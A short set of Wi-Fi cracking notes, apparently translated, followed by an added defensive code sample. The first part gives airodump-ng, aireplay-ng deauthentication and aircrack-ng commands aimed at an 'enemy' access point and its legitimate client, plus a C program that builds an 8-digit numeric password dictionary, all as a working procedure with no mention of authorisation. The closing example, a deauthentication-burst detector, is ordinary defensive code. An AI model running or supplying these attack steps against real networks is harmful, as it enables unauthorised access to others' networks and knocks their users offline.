00:23:69:xx:xx:xx -85 6 54 WPA TKIP PSK HCP
00:0A:EB:xx:xx:xx local MAC
00:23:69:xx:xx:xx enemy MAC (the AP)
00:14:A5:xx:xx:DD MAC of a legitimate client on the enemy AP
airodump-ng -c 6 --bssid 00:23:69:xx:xx:xx -w HCP mon0
aireplay-ng -0 10 -a 00:23:69:xx:xx:xx mon0
Or enter: aireplay-ng -0 10 -a (AP MAC) -c (legitimate client MAC) mon0
aireplay-ng -0 10 -a 00:23:69:xx:xx:xx -c 00:14:A5:xx:xx:DD mon0
Capturing a single handshake is enough.
Dictionary cracking
aircrack-ng -w password.txt HCP*.cap
Another version says to use aircrack-ng -w password.txt -b (AP MAC) 12345*.cap
Generating the dictionary on Linux: p.c
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
    int i=1;
    //printf("%d\n",sizeof(long int));
    /* Print every number from 00000000 to 99999999, one per line.
       Each loop handles one digit count and pads it with zeros to 8 digits. */
    printf("00000000\n");
    while(i<=9){printf("0000000%d\n",i);i++;}
    while(i<=99){printf("000000%d\n",i);i++;}
    while(i<=999){printf("00000%d\n",i);i++;}
    while(i<=9999){printf("0000%d\n",i);i++;}
    while(i<=99999){printf("000%d\n",i);i++;}
    while(i<=999999){printf("00%d\n",i);i++;}
    while(i<=9999999){printf("0%d\n",i);i++;}
    while(i<=99999999){printf("%d\n",i);i++;}
    return 0;
}
gcc p.c -o p
./p > 8bit
This generates an 8-digit, digits-only dictionary; the generated file is 853M in size.
If this is not clear, see:
http://www.kumouse.com/article.asp?id=144
http://www.kumouse.com/article.asp?id=156
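
Added example, not part of the original page: seen from the defending side, the aireplay-ng -0 commands above appear on the air as a burst of 802.11 deauthentication frames on one receiver/transmitter pair. The C code below counts such frames in a capture window and reports pairs that reach a threshold. It assumes each frame starts at the 802.11 header (no radiotap header); the threshold, the table size, the function names and the MAC addresses are constructed for illustration.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define FRAME_LEN 26   /* 24-byte management header + 2-byte reason code */
#define MAX_PAIRS 16   /* hypothetical table size */

struct pair { uint8_t addrs[12]; int count; };  /* addr1 (RA) + addr2 (TA) */

/* Frame-control byte 0 is 0xC0 for deauthentication:
   protocol version 0, type 0 (management), subtype 12. */
static int is_deauth(const uint8_t *f) { return f[0] == 0xC0; }

/* Tally deauth frames per receiver/transmitter pair in one capture window
   and return how many pairs reach `threshold` frames. */
int deauth_bursts(uint8_t frames[][FRAME_LEN], size_t n, int threshold) {
    struct pair seen[MAX_PAIRS];
    int npairs = 0, bursts = 0;
    for (size_t i = 0; i < n; i++) {
        if (!is_deauth(frames[i])) continue;
        const uint8_t *key = frames[i] + 4;      /* addr1 and addr2 are adjacent */
        int j = 0;
        while (j < npairs && memcmp(seen[j].addrs, key, 12)) j++;
        if (j == npairs) {
            if (npairs == MAX_PAIRS) continue;   /* table full: skip new pairs */
            memcpy(seen[j].addrs, key, 12);
            seen[j].count = 0;
            npairs++;
        }
        if (++seen[j].count == threshold) bursts++;
    }
    return bursts;
}

/* Constructed window: 12 deauths AP -> client, 1 deauth client -> AP,
   and 1 beacon (frame control 0x80) that must be ignored. */
int demo_window(int threshold) {
    static const uint8_t ap[6]  = {0x02, 0, 0, 0, 0, 0x01};  /* constructed MAC */
    static const uint8_t sta[6] = {0x02, 0, 0, 0, 0, 0x02};  /* constructed MAC */
    uint8_t w[14][FRAME_LEN] = {{0}};
    for (int i = 0; i < 14; i++) {
        w[i][0] = (i == 13) ? 0x80 : 0xC0;
        memcpy(w[i] + 4,  (i == 12) ? ap : sta, 6);   /* addr1: receiver */
        memcpy(w[i] + 10, (i == 12) ? sta : ap, 6);   /* addr2: transmitter */
    }
    return deauth_bursts(w, 14, threshold);
}

int main(void) { printf("pairs at threshold: %d\n", demo_window(10)); return 0; }
```

On a real network the window length and threshold have to be tuned against the normal rate of deauthentication frames, since clients and APs send a few of them legitimately.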